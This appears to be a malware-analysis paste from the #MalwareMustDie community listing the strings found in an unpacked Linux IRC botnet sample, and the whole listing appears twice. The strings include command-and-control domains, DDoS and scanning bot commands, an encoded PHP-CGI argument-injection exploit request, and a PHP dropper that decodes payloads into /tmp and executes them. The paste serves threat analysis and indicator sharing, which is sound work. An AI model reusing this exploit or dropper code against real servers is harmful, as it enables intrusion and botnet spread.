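- // #MalwareMustDie - Latest version of the BossaBot sample (unpacked)
- // VT: https://www.virustotal.com/en/file/0f0558ac7bca56a30689ada0b31a7887dbe8046af74fc66812852fb7f3beace7/analysis/1412321840/
- // sample is 2 weeks old; attacks are 1 day old
- // pic: malekal
- // format: file offset, then the printable string found at that offset; the listing below appears twice in this paste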
- 0x00001 ELF
- 0x000F4 /lib/ld-linux.so.2
- 0x00114 GNU
- 0x00891 libpthread.so.0
- 0x008A1 waitpid
- 0x008A9 recv
- 0x008AE connect
- 0x008B6 pthread_exit
- 0x008C3 pthread_create
- 0x008D2 send
- 0x008D7 accept
- 0x008DE wait
- 0x008E3 fork
- 0x008E8 sigaction
- 0x008F2 __h_errno_location
- 0x00905 __errno_location
- 0x00916 _Jv_RegisterClasses
- 0x0092A libc.so.6
- 0x00934 strcpy
- 0x0093B ioctl
- 0x00941 stdout
- 0x00948 vsprintf
- 0x00951 snprintf
- 0x0095A __strtol_internal
- 0x0096C getpid
- 0x00973 fgets
- 0x00979 memcpy
- 0x00980 pclose
- 0x00987 perror
- 0x0098E feof
- 0x00993 malloc
- 0x0099A sleep
- 0x009A0 sysinfo
- 0x009A8 socket
- 0x009AF select
- 0x009B6 fflush
- 0x009BD alarm
- 0x009C3 popen
- 0x009C9 calloc
- 0x009D0 kill
- 0x009D5 bind
- 0x009DA inet_addr
- 0x009E4 setsockopt
- 0x009EF fseek
- 0x009F5 ferror
- 0x009FC strstr
- 0x00A03 strncpy
- 0x00A0B strcasecmp
- 0x00A16 __strdup
- 0x00A1F bcopy
- 0x00A25 _IO_getc
- 0x00A2E strtok
- 0x00A35 listen
- 0x00A3C sscanf
- 0x00A43 fread
- 0x00A49 memset
- 0x00A50 ftell
- 0x00A56 srand
- 0x00A5C getppid
- 0x00A64 time
- 0x00A69 getcwd
- 0x00A70 gethostbyname
- 0x00A7E fclose
- 0x00A85 hstrerror
- 0x00A8F fwrite
- 0x00A96 rewind
- 0x00A9D inet_ntop
- 0x00AA7 fopen
- 0x00AAD _IO_putc
- 0x00AB6 __ctype_toupper_loc
- 0x00ACA _IO_stdin_used
- 0x00AD9 daemon
- 0x00AE0 __libc_start_main
- 0x00AF2 fputs
- 0x00AF8 vfprintf
- 0x00B01 free
- 0x00B06 __gmon_start__
- 0x00B15 GLIBC_2.1
- 0x00B1F GLIBC_2.0
- 0x00B29 GLIBC_2.3
- 0x013A8 PTRh
- 0x013B5 QVh
- 0x01453 WVS
- 0x0154C IQh
- 0x01563 WVS
- 0x015E6 G -
- 0x01624 5~w=
- 0x0162F 6~l=
- 0x0163A 7~a=
- 0x01645 8~V=
- 0x01650 9~K=
- 0x01661 G ]
- 0x01667 -~4=
- 0x01672 5~)=
- 0x016AB WVS
- 0x016C7 tOVj
- 0x016CF RPf
- 0x0181B tP<
- 0x0182A t7<
- 0x0187B WVS
- 0x01895 XZh*
- 0x01904 SWj
- 0x01B43 QVP
- 0x01BD6 RVS
- 0x01BEF IQS
- 0x01C8B WVS
- 0x01EF7 WVS
- 0x02250 RSV
- 0x02267 WVS
- 0x022BD C$f
- 0x022D9 Htl
- 0x0234C S(RV
- 0x02360 S(R
- 0x02376 j.V
- 0x0238B WVS
- 0x0241F Z P
- 0x0243B Qh
- 0x02457 V(R
- 0x02561 V(R
- 0x0265F WVS
- 0x0287B WVS
- 0x02990 QSW
- 0x02A3F WVS
- 0x02B23 4;V
- 0x02B30 tZC
- 0x02BDB WVS
- 0x02CBF 4;V
- 0x02CCC tZC
- 0x02D77 WVS
- 0x02E3F t9Ku
- 0x02FC7 WVS
- 0x02FE8 QSV
- 0x030A7 PSh
- 0x03113 WVS
- 0x03133 : t
- 0x03144 CI9
- 0x03176 8!t"
- 0x0318D CI9
- 0x03197 <;!u
- 0x031AA 8!t
- 0x03207 8 t'
- 0x03220 CI9
- 0x0322D <3 u
- 0x03302 XZh
- 0x0340F < t
- 0x0341E CB9
- 0x0344D <;
- 0x03462 CI9
- 0x034DC 8 t&
- 0x034F4 CI9
- 0x03501 <; u
- 0x0358E WHP
- 0x035FF WVS
- 0x03625 I9M
- 0x0362C ; t"
- 0x03646 IC9M
- 0x0364E ; u
- 0x03661 IC9M
- 0x0368B ; t%
- 0x036A5 I9M
- 0x03702 I9M
- 0x03709 ; t!
- 0x03722 IC9M
- 0x0372A ; u
- 0x0373D IC9M
- 0x03767 ; t#
- 0x0377F I9M
- 0x037A4 @t7
- 0x0380B WVS
- 0x038B4 Rh!T
- 0x038F3 w@
- 0x0391D jt6
- 0x03989 j j
- 0x039DB WVS
- 0x039F9 ZYh/
- 0x03A2E _h*
- 0x03A3E Y[h/
- 0x03A72 XZh
- 0x03AF9 PWhU
- 0x03B23 u&PSh
- 0x03B62 XZh]
- 0x03BB8 IQh_
- 0x03BE8 WIQj
- 0x03CCB Q@P
- 0x03DA6 ;=H
- 0x03E8A > t
- 0x03E9D CI9
- 0x03EA4 <3 u
- 0x03F77 CI9
- 0x03F7E <3 u
- 0x03FFF WVS
- 0x040FF WVS1
- 0x0418A VS1
- 0x042EB WVS
- 0x04306 XZh/
- 0x04316 WPV
- 0x0433F WVS
- 0x0435B Xh/
- 0x0436A WPV
- 0x043CE PRh
- 0x04487 WVS
- 0x044A9 :!t#
- 0x044C1 I9M
- 0x044F1 8:t2
- 0x045E8 srv5050.co
- 0x045F3 ka3ek.com
- 0x045FD ircqfrum.com
- 0x0460A 8rb.su
- 0x04611 %s : USERID : UNIX : %s
- 0x0462D /tmp/ReV1112.z
- 0x0463C /tmp/ReV11122.z
- 0x0464C /cgi-bin/php
- 0x04659 /cgi-bin/php5
- 0x04667 /cgi-bin/php-cgi
- 0x04678 /cgi-bin/php5-cgi
- 0x0468A /cgi-bin/php-cgi.bin
- 0x0469F /tmp
- 0x046A4 NOTICE %s :EX %s T %s
- 0x046BB NOTICE %s :rnd %s t %s t %s
- 0x046D8 %d.%d.%d.%d
- 0x046E4 NOTICE %s :WT
- 0x046F3 NOTICE %s :SD
- 0x04702 NOTICE %s :rnd2 %s t %s t %s
- 0x04720 %hu.%hu.%hu.%hu
- 0x04730 NOTICE %s :S5 %d
- 0x04742 b64:000:Invalid Message Code.
- 0x04760 GET %s HTTP/1.0
- 0x04774 NOTICE %s :request=[%s]
- 0x0478D close error
- 0x04799 WEBDOS
- 0x047A0 SERVER
- 0x047A7 SCANRND
- 0x047AF SCANRND2
- 0x047B8 MOVE
- 0x047BD SOCKS5
- 0x047C4 IRC
- 0x047C9 NOTICE %s :Unable to comply.
- 0x047E7 SH
- 0x047EB NOTICE %s :%s
- 0x047FA 352
- 0x047FE 376
- 0x04802 433
- 0x04806 422
- 0x0480A PRIVMSG
- 0x04812 PING
- 0x04817 NICK
- 0x0481C TOPIC
- 0x04822 /tmp/ReV1112
- 0x04832 /tmp/ReV11122
- 0x04840 /etc/init.d/rc.local
- 0x04855 "%s%s"
- 0x0485F -bash
- 0x04865 #rev
- 0x0486D ERROR
- 0x04873 /etc/rc.conf
- 0x04880 NOTICE %s :MOVE <server>
- 0x0489A MODE %s -x
- 0x048A6 MODE %s +i
- 0x048B2 JOIN %s :%s
- 0x048BF WHO %s
- 0x048C7 PONG %s
- 0x048E0 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%7%6E HTTP/10x04CBF 0x04CBF Host: %s
- 0x04CC9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 0x04D18 Content-Type: application/x-www-form-urlencoded
- 0x04D49 Content-Length: %d
- 0x04D5D Connection: close
- 0x04D80 <?php
- 0x04D86 $bufferf = '%s';
- 0x04D97 $bufferf2 = '%s';
- 0x075A9 LCJbXDJUY3BGbG9vZCBGaW5pc2hlZCFcMl06IENvbmZpZyAtCiAKJHBhY2tldHMgcGFjb3RlcyBwYXJhICRob3N0OiRwb3J0LiIpOwp9Cn0KIAokYm90ID0gbmV3IHBCb3Q7CiRib3QtPnN0YXJ0KCk7CiAKPz4K';
- 0x0764C $Vdkqrxiiyr3t = sys_get_temp_dir();
- 0x07670 $Vgxl4ifsipo5 = getcwd();
- 0x0768A $Vos03apkyec1 = "ReV1112";
- 0x076A5 $Vos03apkyec2 = "ReV11122";
- 0x076C1 $Vos03apkyec3 = "WOP";
- 0x076D8 $V5lgt4awdv3b = "chmod 777";
- 0x076F5 $V5lgt4awdv3c = "php";
- 0x0770C if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))
- 0x07741 exit(1);
- 0x0774A }else{
- 0x07751 echo($Vdkqrxiiyr3t);
- 0x07766 $bufferf = base64_decode($bufferf);
- 0x0778A $bufferf2 = base64_decode($bufferf2);
- 0x077B0 $wop = base64_decode($wop);
- 0x077CC file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);
- 0x07808 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);
- 0x07845 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec3", $wop);
- 0x0787D chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);
- 0x078AB system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");
- 0x078E7 chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);
- 0x07915 system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");
- 0x07951 system($Vdkqrxiiyr3t . "/$Vos03apkyec2");
- 0x0797B system($Vdkqrxiiyr3t . "/$Vos03apkyec1");
- 0x079A5 system("$V5lgt4awdv3c " . $Vdkqrxiiyr3t . "/$Vos03apkyec3");
- 0x079E2 exit(1);
- 0x07A00 b64:001:Syntax Error -- check help (-h) for usage.
- 0x07A40 b64:002:File Error Opening/Creating Files.
- 0x07A80 b64:003:File I/O Error -- Note: output file not removed.
- 0x07AC0 b64:004:Error on output file close.
- 0x07B00 b64:005:linesize set to minimum.
- 0x07B40 b64:006:Syntax: Too many arguments.
- 0x07B80 gethostbyname() error for host:%s:%s
- 0x07BC0 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 0x07C00 NICK %s
- 0x07C08 USER %s localhost localhost :%s
- 0x07C3F >ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- 0x07CA0 |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]
- 0x07CDF abcdefghijklmnopq
- 0x08341 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08374 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083A7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083DA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x0840D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08440 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08473 .shstrtab
- 0x0847D .interp
- 0x08485 .note.ABI-tag
- 0x08493 .hash
- 0x08499 .dynsym
- 0x084A1 .dynstr
- 0x084A9 .gnu.version
- 0x084B6 .gnu.version_r
- 0x084C5 .rel.dyn
- 0x084CE .rel.plt
- 0x084D7 .init
- 0x084DD .text
- 0x084E3 .fini
- 0x084E9 .rodata
- 0x084F1 .eh_frame
- 0x084FB .data
- 0x08501 .dynamic
- 0x0850A .ctors
- 0x08511 .dtors
- 0x08518 .jcr
- 0x0851D .got
- 0x08522 .bss
- 0x08527 .comment
- 0x00001 ELF
- 0x000F4 /lib/ld-linux.so.2
- 0x00114 GNU
- 0x00891 libpthread.so.0
- 0x008A1 waitpid
- 0x008A9 recv
- 0x008AE connect
- 0x008B6 pthread_exit
- 0x008C3 pthread_create
- 0x008D2 send
- 0x008D7 accept
- 0x008DE wait
- 0x008E3 fork
- 0x008E8 sigaction
- 0x008F2 __h_errno_location
- 0x00905 __errno_location
- 0x00916 _Jv_RegisterClasses
- 0x0092A libc.so.6
- 0x00934 strcpy
- 0x0093B ioctl
- 0x00941 stdout
- 0x00948 vsprintf
- 0x00951 snprintf
- 0x0095A __strtol_internal
- 0x0096C getpid
- 0x00973 fgets
- 0x00979 memcpy
- 0x00980 pclose
- 0x00987 perror
- 0x0098E feof
- 0x00993 malloc
- 0x0099A sleep
- 0x009A0 sysinfo
- 0x009A8 socket
- 0x009AF select
- 0x009B6 fflush
- 0x009BD alarm
- 0x009C3 popen
- 0x009C9 calloc
- 0x009D0 kill
- 0x009D5 bind
- 0x009DA inet_addr
- 0x009E4 setsockopt
- 0x009EF fseek
- 0x009F5 ferror
- 0x009FC strstr
- 0x00A03 strncpy
- 0x00A0B strcasecmp
- 0x00A16 __strdup
- 0x00A1F bcopy
- 0x00A25 _IO_getc
- 0x00A2E strtok
- 0x00A35 listen
- 0x00A3C sscanf
- 0x00A43 fread
- 0x00A49 memset
- 0x00A50 ftell
- 0x00A56 srand
- 0x00A5C getppid
- 0x00A64 time
- 0x00A69 getcwd
- 0x00A70 gethostbyname
- 0x00A7E fclose
- 0x00A85 hstrerror
- 0x00A8F fwrite
- 0x00A96 rewind
- 0x00A9D inet_ntop
- 0x00AA7 fopen
- 0x00AAD _IO_putc
- 0x00AB6 __ctype_toupper_loc
- 0x00ACA _IO_stdin_used
- 0x00AD9 daemon
- 0x00AE0 __libc_start_main
- 0x00AF2 fputs
- 0x00AF8 vfprintf
- 0x00B01 free
- 0x00B06 __gmon_start__
- 0x00B15 GLIBC_2.1
- 0x00B1F GLIBC_2.0
- 0x00B29 GLIBC_2.3
- 0x013A8 PTRh
- 0x013B5 QVh
- 0x01453 WVS
- 0x0154C IQh
- 0x01563 WVS
- 0x015E6 G -
- 0x01624 5~w=
- 0x0162F 6~l=
- 0x0163A 7~a=
- 0x01645 8~V=
- 0x01650 9~K=
- 0x01661 G ]
- 0x01667 -~4=
- 0x01672 5~)=
- 0x016AB WVS
- 0x016C7 tOVj
- 0x016CF RPf
- 0x0181B tP<
- 0x0182A t7<
- 0x0187B WVS
- 0x01895 XZh*
- 0x01904 SWj
- 0x01B43 QVP
- 0x01BD6 RVS
- 0x01BEF IQS
- 0x01C8B WVS
- 0x01EF7 WVS
- 0x02250 RSV
- 0x02267 WVS
- 0x022BD C$f
- 0x022D9 Htl
- 0x0234C S(RV
- 0x02360 S(R
- 0x02376 j.V
- 0x0238B WVS
- 0x0241F Z P
- 0x0243B Qh
- 0x02457 V(R
- 0x02561 V(R
- 0x0265F WVS
- 0x0287B WVS
- 0x02990 QSW
- 0x02A3F WVS
- 0x02B23 4;V
- 0x02B30 tZC
- 0x02BDB WVS
- 0x02CBF 4;V
- 0x02CCC tZC
- 0x02D77 WVS
- 0x02E3F t9Ku
- 0x02FC7 WVS
- 0x02FE8 QSV
- 0x030A7 PSh
- 0x03113 WVS
- 0x03133 : t
- 0x03144 CI9
- 0x03176 8!t"
- 0x0318D CI9
- 0x03197 <;!u
- 0x031AA 8!t
- 0x03207 8 t'
- 0x03220 CI9
- 0x0322D <3 u
- 0x03302 XZh
- 0x0340F < t
- 0x0341E CB9
- 0x0344D <;
- 0x03462 CI9
- 0x034DC 8 t&
- 0x034F4 CI9
- 0x03501 <; u
- 0x0358E WHP
- 0x035FF WVS
- 0x03625 I9M
- 0x0362C ; t"
- 0x03646 IC9M
- 0x0364E ; u
- 0x03661 IC9M
- 0x0368B ; t%
- 0x036A5 I9M
- 0x03702 I9M
- 0x03709 ; t!
- 0x03722 IC9M
- 0x0372A ; u
- 0x0373D IC9M
- 0x03767 ; t#
- 0x0377F I9M
- 0x037A4 @t7
- 0x0380B WVS
- 0x038B4 Rh!T
- 0x038F3 w@
- 0x0391D jt6
- 0x03989 j j
- 0x039DB WVS
- 0x039F9 ZYh/
- 0x03A2E _h*
- 0x03A3E Y[h/
- 0x03A72 XZh
- 0x03AF9 PWhU
- 0x03B23 u&PSh
- 0x03B62 XZh]
- 0x03BB8 IQh_
- 0x03BE8 WIQj
- 0x03CCB Q@P
- 0x03DA6 ;=H
- 0x03E8A > t
- 0x03E9D CI9
- 0x03EA4 <3 u
- 0x03F77 CI9
- 0x03F7E <3 u
- 0x03FFF WVS
- 0x040FF WVS1
- 0x0418A VS1
- 0x042EB WVS
- 0x04306 XZh/
- 0x04316 WPV
- 0x0433F WVS
- 0x0435B Xh/
- 0x0436A WPV
- 0x043CE PRh
- 0x04487 WVS
- 0x044A9 :!t#
- 0x044C1 I9M
- 0x044F1 8:t2
- 0x045E8 srv5050.co
- 0x045F3 ka3ek.com
- 0x045FD ircqfrum.com
- 0x0460A 8rb.su
- 0x04611 %s : USERID : UNIX : %s
- 0x0462D /tmp/ReV1112.z
- 0x0463C /tmp/ReV11122.z
- 0x0464C /cgi-bin/php
- 0x04659 /cgi-bin/php5
- 0x04667 /cgi-bin/php-cgi
- 0x04678 /cgi-bin/php5-cgi
- 0x0468A /cgi-bin/php-cgi.bin
- 0x0469F /tmp
- 0x046A4 NOTICE %s :EX %s T %s
- 0x046BB NOTICE %s :rnd %s t %s t %s
- 0x046D8 %d.%d.%d.%d
- 0x046E4 NOTICE %s :WT
- 0x046F3 NOTICE %s :SD
- 0x04702 NOTICE %s :rnd2 %s t %s t %s
- 0x04720 %hu.%hu.%hu.%hu
- 0x04730 NOTICE %s :S5 %d
- 0x04742 b64:000:Invalid Message Code.
- 0x04760 GET %s HTTP/1.0
- 0x04774 NOTICE %s :request=[%s]
- 0x0478D close error
- 0x04799 WEBDOS
- 0x047A0 SERVER
- 0x047A7 SCANRND
- 0x047AF SCANRND2
- 0x047B8 MOVE
- 0x047BD SOCKS5
- 0x047C4 IRC
- 0x047C9 NOTICE %s :Unable to comply.
- 0x047E7 SH
- 0x047EB NOTICE %s :%s
- 0x047FA 352
- 0x047FE 376
- 0x04802 433
- 0x04806 422
- 0x0480A PRIVMSG
- 0x04812 PING
- 0x04817 NICK
- 0x0481C TOPIC
- 0x04822 /tmp/ReV1112
- 0x04832 /tmp/ReV11122
- 0x04840 /etc/init.d/rc.local
- 0x04855 "%s%s"
- 0x0485F -bash
- 0x04865 #rev
- 0x0486D ERROR
- 0x04873 /etc/rc.conf
- 0x04880 NOTICE %s :MOVE <server>
- 0x0489A MODE %s -x
- 0x048A6 MODE %s +i
- 0x048B2 JOIN %s :%s
- 0x048BF WHO %s
- 0x048C7 PONG %s
- 0x048E0 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%7%6E HTTP/10x04CBF 0x04CBF Host: %s
- 0x04CC9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 0x04D18 Content-Type: application/x-www-form-urlencoded
- 0x04D49 Content-Length: %d
- 0x04D5D Connection: close
- 0x04D80 <?php
- 0x04D86 $bufferf = '%s';
- 0x04D97 $bufferf2 = '%s';
- 0x075A9 LCJbXDJUY3BGbG9vZCBGaW5pc2hlZCFcMl06IENvbmZpZyAtCiAKJHBhY2tldHMgcGFjb3RlcyBwYXJhICRob3N0OiRwb3J0LiIpOwp9Cn0KIAokYm90ID0gbmV3IHBCb3Q7CiRib3QtPnN0YXJ0KCk7CiAKPz4K';
- 0x0764C $Vdkqrxiiyr3t = sys_get_temp_dir();
- 0x07670 $Vgxl4ifsipo5 = getcwd();
- 0x0768A $Vos03apkyec1 = "ReV1112";
- 0x076A5 $Vos03apkyec2 = "ReV11122";
- 0x076C1 $Vos03apkyec3 = "WOP";
- 0x076D8 $V5lgt4awdv3b = "chmod 777";
- 0x076F5 $V5lgt4awdv3c = "php";
- 0x0770C if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))
- 0x07741 exit(1);
- 0x0774A }else{
- 0x07751 echo($Vdkqrxiiyr3t);
- 0x07766 $bufferf = base64_decode($bufferf);
- 0x0778A $bufferf2 = base64_decode($bufferf2);
- 0x077B0 $wop = base64_decode($wop);
- 0x077CC file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);
- 0x07808 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);
- 0x07845 file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec3", $wop);
- 0x0787D chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);
- 0x078AB system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");
- 0x078E7 chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);
- 0x07915 system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");
- 0x07951 system($Vdkqrxiiyr3t . "/$Vos03apkyec2");
- 0x0797B system($Vdkqrxiiyr3t . "/$Vos03apkyec1");
- 0x079A5 system("$V5lgt4awdv3c " . $Vdkqrxiiyr3t . "/$Vos03apkyec3");
- 0x079E2 exit(1);
- 0x07A00 b64:001:Syntax Error -- check help (-h) for usage.
- 0x07A40 b64:002:File Error Opening/Creating Files.
- 0x07A80 b64:003:File I/O Error -- Note: output file not removed.
- 0x07AC0 b64:004:Error on output file close.
- 0x07B00 b64:005:linesize set to minimum.
- 0x07B40 b64:006:Syntax: Too many arguments.
- 0x07B80 gethostbyname() error for host:%s:%s
- 0x07BC0 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 0x07C00 NICK %s
- 0x07C08 USER %s localhost localhost :%s
- 0x07C3F >ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- 0x07CA0 |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]
- 0x07CDF abcdefghijklmnopq
- 0x08341 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08374 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083A7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x083DA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x0840D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08440 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0x08473 .shstrtab
- 0x0847D .interp
- 0x08485 .note.ABI-tag
- 0x08493 .hash
- 0x08499 .dynsym
- 0x084A1 .dynstr
- 0x084A9 .gnu.version
- 0x084B6 .gnu.version_r
- 0x084C5 .rel.dyn
- 0x084CE .rel.plt
- 0x084D7 .init
- 0x084DD .text
- 0x084E3 .fini
- 0x084E9 .rodata
- 0x084F1 .eh_frame
- 0x084FB .data
- 0x08501 .dynamic
- 0x0850A .ctors
- 0x08511 .dtors
- 0x08518 .jcr
- 0x0851D .got
- 0x08522 .bss
- 0x08527 .comment
- ---
- #MalwareMustDie!